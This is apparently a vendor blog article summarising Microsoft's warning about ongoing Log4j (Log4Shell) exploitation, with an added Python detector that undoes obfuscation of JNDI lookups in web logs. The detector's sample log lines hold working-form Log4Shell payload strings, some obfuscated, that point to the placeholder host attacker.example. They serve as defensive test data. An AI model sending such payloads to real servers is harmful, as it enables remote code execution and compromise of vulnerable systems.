Microsoft has warned of continued attempts by nation-state adversaries and commodity attackers to exploit vulnerabilities in the Log4j open-source logging library to deploy malware on vulnerable systems.
"Exploitation attempts and testing have remained high over the closing weeks of December," according to revised guidance published earlier this week by the Microsoft Threat Intelligence Center (MSTIC). "We've seen a number of existing attackers incorporate these vulnerabilities into their existing malware kits and methods, ranging from coin miners to hands-on-keyboard attacks," the researchers said.
The Apache Software Foundation formally revealed the remote code execution (RCE) vulnerability in Apache Log4j 2, dubbed Log4Shell, on December 10, 2021, and it has since emerged as a new attack vector for a number of threat actors.
Four more vulnerabilities in the library were disclosed in the following weeks — CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832 — which opportunistic actors have used to maintain persistent control over compromised machines and mount an evolving range of attacks, from cryptocurrency miners to ransomware.
Attackers are also trying to evade string-matching detections by obfuscating the malicious HTTP requests that, once written to a web request log by Log4j, trigger a JNDI lookup to the attacker-controlled server, even as mass scanning continues unabated.
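As an added detection example (not part of the article or of Microsoft's guidance), the code below resolves the documented Log4j lookup forms (`lower`, `upper`, and `:-` default values) plus percent-encoding before pattern matching, so obfuscated lookups collapse to the canonical `${jndi:<scheme>:` string a string-matching rule expects. The log lines and the `attacker.example` host are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Log4j 2 lookup forms that get nested inside "${jndi:...}" to defeat naive
# substring matching. Resolving them the way Log4j itself would lets the
# detector compare against the canonical "${jndi:<scheme>:" string.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
# "${name:-default}" falls back to "default" when the lookup yields nothing;
# "${::-j}" is the degenerate form with an empty lookup name.
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# Canonical JNDI lookup with the schemes Log4j's JndiLookup can dispatch to.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|nis)\s*:",
                   re.IGNORECASE)

def normalize_lookups(text, max_rounds=20):
    """Percent-decode, then collapse nested lookups innermost-first to a fixed point."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text

def is_jndi_probe(line):
    """True if the log line contains a JNDI lookup once obfuscation is undone."""
    return _JNDI.search(normalize_lookups(line)) is not None

def flag_probes(lines):
    """Return (line_number, normalized_line) for each line carrying a JNDI lookup."""
    return [(n, normalize_lookups(l)) for n, l in enumerate(lines, 1)
            if is_jndi_probe(l)]

# Constructed sample web-server log lines (not real traffic); attacker.example
# is a placeholder host. Lines 1-3 carry a lookup, line 4 is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [11/Dec/2021:03:15:22 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:RMI}://attacker.example/b}"',
    '10.0.0.7 - - [11/Dec/2021:03:16:40 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 120 "-" "curl/7.79"',
    '10.0.0.8 - - [11/Dec/2021:03:17:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, norm in flag_probes(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Log4j supports further lookups (`env`, `sys`, `date` and others) that this normalizer does not resolve, so it reduces evasion rather than eliminating it; patching and removing the JndiLookup class remain the actual fix.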
"Rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch servers to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems," Microsoft said. Additional remote access toolkits and reverse shells, such as Meterpreter, Bladabindi (aka NjRAT), and HabitsRAT, have also been delivered via the Log4Shell vulnerability.
"Customers should consider the general availability of exploit code and scanning capabilities to be a clear and present threat to their environments at this time," MSTIC warned. "Because of the large number of vulnerable software packages and services, as well as the rapid pace of developments, remediation is expected to take a long time, requiring continued, long-term attention."
The news comes as the US Federal Trade Commission (FTC) issued a statement warning that it "intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future."
For many years, Airzero Sec's cybersecurity experts have worked on a variety of projects for a number of well-known companies. Take advantage of our experience, whether it is to help you get there or to carry out technical tests. If you have any doubts about the above topic, don’t hesitate to contact us. Airzero Cloud will be your digital companion.
Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/